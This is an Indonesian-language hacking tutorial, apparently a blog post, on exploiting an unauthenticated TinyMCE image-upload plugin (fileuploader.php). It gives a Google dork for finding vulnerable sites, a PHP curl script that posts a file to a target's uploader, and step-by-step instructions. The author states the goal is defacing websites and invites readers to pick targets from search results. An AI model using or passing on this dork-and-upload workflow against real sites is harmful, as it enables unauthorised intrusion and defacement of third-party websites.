Hallo Gan , skarang sya mau share tutorial "Tinymce Images File Upload Vulnerable" , tdi sya mau nge deface , ehh malah dapat vuln ginian , entah sya yg temukan atau udah keduluan ama orang lain , tpi yg pastinya lumayan lah , buat nge deface :D
Klau gitu langsung aja ke TKP
Dork : inurl:/imgupload/ fileuploader.php (kembangin lgi yah vulnya banyak kok)
CSRF Xampp :
<?php
$uploadfile="foto.jpg";
$ch = curl_init("site.com/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
OK klau udah punya yg diatas , langsung aja cari target di pencarian google dengan mengunakan dork diatas :v
klau udah nemu kyak gini
http://site.com/(path)/extlib/tinymce/plugins/imgupload/
Langsung aja ubah kyak gini mas mbah
http://site.com/(path)/extlib/tinymce/plugins/imgupload/fileuploader.php
Kalau vuln gambarnya kyak gini
Ok langsung aja gunakan csrf xamppnya , nanti keliatan tempat uploadnya kok
Penting : File Yang bisa di upload cuman jpg , png ( php tidak mendukung )
Ok gitu aja gan , klau ada yg kurang vaham isi aja komentar di bwah yah gan :D
Thanks To : PhantomGhost - Sulawesi IT Sec
Facebook : https://www.facebook.com/marselERROR
Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/